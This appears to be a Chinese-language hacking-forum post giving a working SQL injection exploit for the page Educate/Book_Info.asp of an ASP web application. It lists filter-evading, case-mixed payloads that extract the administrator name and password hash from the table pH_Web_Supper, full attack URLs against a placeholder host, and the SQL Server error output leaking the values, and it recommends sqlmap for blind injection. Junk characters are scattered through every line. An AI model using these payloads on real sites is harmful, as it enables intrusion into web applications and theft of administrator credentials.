漏洞出现在Educate/Book_Info.asp
{9 |# m5 M. P 3 q) v- z& c' G( Z5 D+ d
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 s6 v8 S) Y- L, v( ^$ t3 i! {* f: k6 E
7 E' h" B. m' V* Y4 U# d- u9 Kexp:如下% T, ? c8 w3 w9 H3 o% u$ X
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' l1 u0 v" b& j; z) ]/ L4 q查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& c) g0 A k- H: H7 Q' B8 D# D3 W
5 z( q: F! d5 W/ b5 bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
: N7 l8 q! x$ O. D; g
. g" s) J. r6 f+ BMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'# b7 h2 f2 C: r
7 s; t4 B2 l) @: z将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。; I9 S' |3 D* u6 \+ A% c a
# J1 J7 n: H$ V
/Educate/Book_Info.asp,行 8* n& {7 |+ Q1 b0 a
' u- R& w8 [6 e) [% }* T, N
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)4 T) N. `0 a3 f0 d
5 u; m! B* r7 g8 f* Y' i- J5 cMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
( z. I6 b5 V/ Y% H+ X) {
7 H7 F9 z$ } F( c! ]/ T将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* `, M5 a) J }- l u' _+ R
3 t/ ]! J+ O! b" _$ [0 |/Educate/Book_Info.asp,行 8% s ^' t. Y; `* s4 N' _
|